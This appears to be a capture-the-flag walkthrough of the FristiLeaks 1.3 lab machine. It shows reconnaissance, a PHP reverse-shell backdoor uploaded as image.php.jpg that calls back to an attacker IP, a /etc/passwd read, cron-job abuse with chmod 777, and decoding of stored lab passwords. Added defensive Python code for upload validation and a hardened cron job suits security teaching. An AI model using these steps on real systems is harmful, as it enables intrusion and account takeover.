
VulnHub Writeup : FristiLeaks 1.3
Box Stats :
| Box Information | Details |
|---|---|
| Box Name | FristiLeaks 1.3 |
| Series | FristiLeaks |
| Release Date | 14 Dec 2015 |
| Author | Ar0xA |
| Difficulty | Basic |
| Download Link | Link |
Nmap Scan
The IP of the target VM is `192.168.1.11`; now run the Nmap scan:
$ nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11
# Nmap 7.91 scan initiated Wed Nov 17 13:52:14 2021 as: nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11
Nmap scan report for 192.168.1.11
Host is up (0.0039s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 3.85 ms 192.168.1.11
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 17 13:52:43 2021 -- 1 IP address (1 host up) scanned in 29.36 seconds
Findings :
- Open ports : 80
- robots.txt entries : /cola, /sisi, /beer
Now checking the web server on port 80. There is a webpage:

It contains no significant information. Next, try the directories listed in robots.txt; each of them only shows an image and nothing else.
Nikto Scan
$ nikto -url http://192.168.1.11/ -output nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2021-11-19 08:45:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-11-19 08:46:16 (GMT-5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Directory Bruteforcing
Directory brute-forcing with ffuf, using the common.txt wordlist from SecLists, extended with some new words gathered by cewl:
cewl http://192.168.1.11/ | anew common.txt
Now brute-forcing:
$ ffuf -c -u http://192.168.1.11/FUZZ -ac -se -w common.txt -of csv -o ffuf.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.11/FUZZ
:: Wordlist : FUZZ: common.txt
:: Output file : ffuf.txt
:: File format : csv
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 227
:: Filter : Response words: 15
:: Filter : Response lines: 9
________________________________________________
[Status: 200, Size: 703, Words: 66, Lines: 16]
images [Status: 301, Size: 235, Words: 14, Lines: 8]
index.html [Status: 200, Size: 703, Words: 66, Lines: 16]
robots.txt [Status: 200, Size: 62, Words: 5, Lines: 5]
:: Progress: [4653/4653] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
- There is an images directory containing some images.
- I also fuzzed sisi, beer and cola, but found nothing much.
At this point I had found nothing, so I looked at some other writeups and saw that there is a directory named fristi.

It has a login panel; let's try sqlmap against it.
$ cat header
POST /fristi/checklogin.php HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.11/fristi/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.11
Connection: keep-alive
Cookie: PHPSESSID=rjob78365dj1t9njiqa1mk6980
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
myusername=hello&mypassword=man&Submit=Login
$ sqlmap -r header -p myusername
Nothing was found, and testing the mypassword field likewise found nothing.
Looking at the page source, we find a username, eezeepz, and further down the page an unused base64 string, so let's decode it.
$ echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d
PNG
IHDRm4AsRGBgAMA
a pHYsodRIDATx^Qv a
zl&I%KH@f455VI
s~E"Gx#/r9E"Gx#/r9E"Gx#/&T3h#3j
~ݿ~2ZeLZZUW$oy{K}fP9{6XKKL>a%ZD
'*%&RxgյV3]#qpzR\Zb -]յJH9r(I5seGtXq"k6j 6 ŚB5o:å0VKKL>eKZt1n
FnT3Wגߞj g=YxibѢꍗjH-YJH5ӅxD7(
ߠMI6D3
MJH5ӅZl3GYdMo6TrR
/-5ӅJI,i9lѢYD![
otWK}fh}d [T5!Ռuɘ-ӇӋ,C-GR,kj\g}<g.Ռuɘ-V_uZ#|_AӜ'cjƸdЖJ{<7
9C}fP4p]OI5c\2hKGtb#* :RJjƺ$#+o`L*9I:,>U騢"3jƼdȖ#۞j)'zUqF>LZ[Z4LZR}fˑS;|f.-hFEZT_>sda6(.U^n|/ZZ=#;tT_>Trd+?87j-}dRt!#/r9E"Gx#/r9E"Gx#/r9E"Gx#/r9EZ8rqIENDB`
As we can see, the output starts with the PNG header, so it is an image file; now store it in a file:
echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d > image.png
Opening this image file reveals the string keKkeKKeKKeKkEkkEk. Now let's try to log in with the username eezeepz and the password keKkeKKeKKeKkEkkEk.

The login succeeds and gives us an image upload page; an uploaded image can be accessed at http://192.168.1.11/fristi/uploads/sample_image.jpg. Now let's try to upload a PHP backdoor (the backend runs PHP, as the Nikto scan revealed). I am using the rshell tool, which generates a PHP backdoor file: https://github.com/ajaytekam/rshell
./rshell.py -ip 192.168.1.9 -p 9999 -o image.php
[+] Payload Stored on "image.php"
Now try to upload it:

The error message shows that it only accepts png, jpg and gif files. So let's make copies of the backdoor file named image.jpg, image.jpg.php and image.php.jpg, start a listener, and see which file gets accepted and executed.
- image.jpg is accepted but not executed; it shows an error message.
- image.jpg.php is not accepted.
- image.php.jpg is accepted and executed, and gives us a reverse shell on the system.

Opening the backdoor file at http://192.168.1.11/fristi/uploads/image.php.jpg gives us a reverse shell:
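As an added defensive illustration (not code from the writeup, the box or the rshell project), the following Python shows two things the steps above rely on: identifying a decoded blob by its magic bytes, as with the base64 PNG found in the page source, and a server-side upload check that would have refused image.php.jpg and an image carrying a PHP tag. The multi-extension name slips through because Apache's mod_mime applies a handler when any of a file's extensions matches, so an AddHandler for .php that is not anchored with a `<FilesMatch "\.php$">` block also runs image.php.jpg as PHP; storing uploads under a server-chosen single-extension name removes that path. The signature table, the filename rule and all sample inputs here are constructed for this example.

```python
import base64
import os
import re
import secrets

# Well-known file headers for the three image types the upload form accepts
# (constructed table for this example, nothing box-specific).
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Every accepted extension maps to the canonical type its content must match.
EXT_TO_TYPE = {"png": "png", "jpg": "jpg", "jpeg": "jpg", "gif": "gif"}


def sniff_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' based on the leading bytes, else None."""
    for kind, sigs in SIGNATURES.items():
        if any(data.startswith(sig) for sig in sigs):
            return kind
    return None


def decode_embedded_blob(b64_text: str):
    """Decode a base64 string lifted from page source (line breaks and other
    whitespace are tolerated) and report what file type it looks like."""
    data = base64.b64decode("".join(b64_text.split()))
    return data, sniff_type(data)


def validate_upload(client_filename: str, data: bytes):
    """Server-side upload check. Returns (accepted, reason_or_stored_name).

    Multi-extension names such as image.php.jpg are rejected outright: with a
    non-anchored AddHandler for .php, Apache would still execute that file.
    """
    base = os.path.basename(client_filename).lower()
    parts = base.split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "filename must be one word with a single extension"
    ext = parts[1]
    if ext not in EXT_TO_TYPE:
        return False, "extension not allowed"
    expected = EXT_TO_TYPE[ext]
    if sniff_type(data) != expected:
        return False, "file content does not match its extension"
    # Defence in depth: a picture upload should never contain a PHP open tag,
    # even when the magic bytes are a valid image header (polyglot file).
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    # The client's name never reaches disk: store under a random server-chosen
    # name with the canonical extension of the sniffed type.
    return True, f"{secrets.token_hex(8)}.{expected}"


if __name__ == "__main__":
    # "iVBORw0KGgo" is the prefix of the blob on the page; it encodes exactly
    # the 8-byte PNG signature.
    data, kind = decode_embedded_blob("iVBORw0KGgo=\n")
    print(kind, data)
    # Constructed upload attempts mirroring the three names tried above.
    samples = [
        ("image.jpg", b"\xff\xd8\xff\xe0 constructed jpeg body"),
        ("image.jpg.php", b"\xff\xd8\xff\xe0"),
        ("image.php.jpg", b"<?php echo 'x'; ?>"),
        ("image.png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 'x'; ?>"),
    ]
    for name, body in samples:
        print(name, validate_upload(name, body))
```

The stored name is generated by the server, so the only extension that ever reaches the document root is the one the sniffed content justifies; pair this with a handler directive anchored on the final extension.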

Privilege Escalation
Doing some basic reconnaissance on the system:
- Listing all users
bash-4.1$ awk -F: '{print $1}' /etc/passwd
awk -F: '{print $1}' /etc/passwd
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
uucp
operator
games
gopher
ftp
nobody
vcsa
saslauth
postfix
sshd
apache
mysql
vboxadd
eezeepz
admin
fristigod
fristi
Users found : root, eezeepz, admin, fristigod, fristi
- Checking Home Directory
sh-4.1$ cd home
sh-4.1$ ls
admin
eezeepz
fristigod
Now checking the user home directories:
sh-4.1$ cd fristigod
sh: cd: fristigod: Permission denied
sh-4.1$ cd admin
sh: cd: admin: Permission denied
sh-4.1$
Permission is denied for admin and fristigod; now checking eezeepz:
sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 2015 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 2015 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 2015 zic
sh-4.1$
There is an interesting file named notes.txt:
bash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/\* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
This means we can run the listed commands by writing them to /tmp/runthis, which a cron job executes as user admin, storing the output in /tmp/cronresult. The permitted binaries are chmod, df, cat, echo, ps, grep and egrep. So we can give ourselves access to admin's home folder with /home/admin/chmod -R 777 /home/admin:
bash-4.1$ echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
bash-4.1$ cat /tmp/cronresult
executing: /home/admin/chmod -R 777 /home/admin
bash-4.1$ rm /tmp/runthis
rm /tmp/runthis
bash-4.1$
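The design flaw here is that a privileged cron job consumes a command file from a world-writable directory and hands the caller a chmod with free arguments. As an added example (not the box's cronjob.py, which this writeup never shows), the hypothetical Python replacement below checks the command file's owner and mode through the already-open descriptor, allows only the read-only binaries by full path, confines path arguments to a sandbox directory and runs each command without a shell. The sandbox /tmp/ezcheck, the file names, the uid values and the sample lines are assumptions made for this example.

```python
import os
import shlex
import stat
import subprocess

ALLOWED_BIN_DIR = "/home/admin"
# chmod is deliberately absent: a permission-changing tool with caller-chosen
# arguments is exactly what turned the original job into an escalation path.
ALLOWED_BINS = {"df", "cat", "echo", "ps", "grep", "egrep"}
# Hypothetical sandbox: every path argument must resolve inside it.
SANDBOX = "/tmp/ezcheck"
COMMAND_FILE = os.path.join(SANDBOX, "runthis")
RESULT_FILE = os.path.join(SANDBOX, "cronresult")


def command_file_is_trusted(st_mode: int, st_uid: int, expected_uid: int) -> bool:
    """Accept only a regular file owned by the expected user that nobody else
    can write. Symlinks and group/world-writable files are refused."""
    if not stat.S_ISREG(st_mode):
        return False
    if st_uid != expected_uid:
        return False
    return (st_mode & (stat.S_IWGRP | stat.S_IWOTH)) == 0


def _inside_sandbox(path: str) -> bool:
    full = path if os.path.isabs(path) else os.path.join(SANDBOX, path)
    real = os.path.normpath(full)
    return real == SANDBOX or real.startswith(SANDBOX + os.sep)


def check_command(line: str):
    """Return (ok, reason) for one line of the command file."""
    try:
        argv = shlex.split(line, comments=True)
    except ValueError as exc:
        return False, f"unparseable line: {exc}"
    if not argv:
        return False, "empty line"
    prog = argv[0]
    if os.path.dirname(prog) != ALLOWED_BIN_DIR or os.path.basename(prog) not in ALLOWED_BINS:
        return False, f"binary not allowed: {prog}"
    for arg in argv[1:]:
        # Look through --opt=value so a path hidden in an option is checked too.
        candidate = arg.split("=", 1)[1] if arg.startswith("--") and "=" in arg else arg
        if candidate.startswith("-"):
            continue  # plain option flags pass through
        if "/" in candidate or candidate in (".", ".."):
            if not _inside_sandbox(candidate):
                return False, f"path outside sandbox: {arg}"
    return True, "ok"


def run_job(expected_uid: int):
    """Read the command file safely and execute each approved line."""
    try:
        fd = os.open(COMMAND_FILE, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return []
    with os.fdopen(fd) as fh:
        # fstat the descriptor we will read from: no check-then-use race.
        st = os.fstat(fh.fileno())
        if not command_file_is_trusted(st.st_mode, st.st_uid, expected_uid):
            return [("<file>", False, "command file is not trusted")]
        lines = fh.read().splitlines()
    results = []
    with open(RESULT_FILE, "a") as out:
        for line in lines:
            ok, reason = check_command(line)
            if ok:
                out.flush()
                try:
                    proc = subprocess.run(shlex.split(line, comments=True), cwd=SANDBOX,
                                          env={"PATH": ""}, stdout=out,
                                          stderr=subprocess.STDOUT, timeout=30)
                    reason = f"exit {proc.returncode}"
                except subprocess.TimeoutExpired:
                    reason = "timed out"
            out.write(f"{line!r}: {reason}\n")
            results.append((line, ok, reason))
    return results


if __name__ == "__main__":
    # Constructed sample lines: the first is the exact line used above.
    for sample in ["/home/admin/chmod -R 777 /home/admin",
                   "/home/admin/cat /tmp/ezcheck/out.txt",
                   "/home/admin/grep root /etc/passwd"]:
        print(sample, "->", check_command(sample))
```

Even with these checks the job still runs as admin, so the remaining risk is whatever the allowed binaries can read inside the sandbox; the point is that the caller can no longer pick a binary or a target outside it.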
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd admin
cd admin
bash-4.1$ ls -al
ls -al
total 656
drwxrwxrwx. 2 admin admin 4096 Nov 19 17:08 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rwxrwxrwx 1 admin admin 1117 Nov 19 17:53 .bash_history
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rwxrwxrwx 1 admin admin 0 Nov 19 16:49 res
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
bash-4.1$
There are two files with encrypted data
$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
And there is a Python script which appears to be the string encoder used for them:
bash-4.1$ cat cryptpass.py
cat cryptpass.py
# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
bash-4.1$
The encodeString function above base64-encodes the string, reverses the result, and then applies rot13. To undo it we apply the steps in reverse order:
- Apply rot13 to the string (rot13 is its own inverse)
- Reverse the result
- Base64-decode it
The following script, decodeString.py, recovers the original string:
#!/usr/bin/python3
import base64, codecs, sys

def decode(token):
    # Undo cryptpass.py in reverse order: rot13 is its own inverse, then
    # un-reverse, then base64-decode (b64decode returns bytes, hence b'...').
    step1 = codecs.decode(token, 'rot13')
    print(base64.b64decode(step1[::-1]))

decode(sys.argv[1])
Now decoding the strings:
$ ./decodeString.py mVGZ3O3omkJLmy2pcuTq
b'thisisalsopw123'
$ ./decodeString.py =RFn0AKnlMHMPIzpyuTI0ITG
b'LetThereBeFristi!'
Now we have the passwords:
- admin : thisisalsopw123
- fristigod : LetThereBeFristi!
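To show the scheme from both sides, here is an added Python 3 re-implementation of the transform cryptpass.py applies and its inverse (example code, not the box's script or the decoder above). Running it confirms the box's values: encoding thisisalsopw123 yields mVGZ3O3omkJLmy2pcuTq, and both stored tokens decode to the passwords just found. Because the transform has no key, anyone who can read cryptpass.py can reverse it; it is obfuscation, not encryption.

```python
import base64
import codecs

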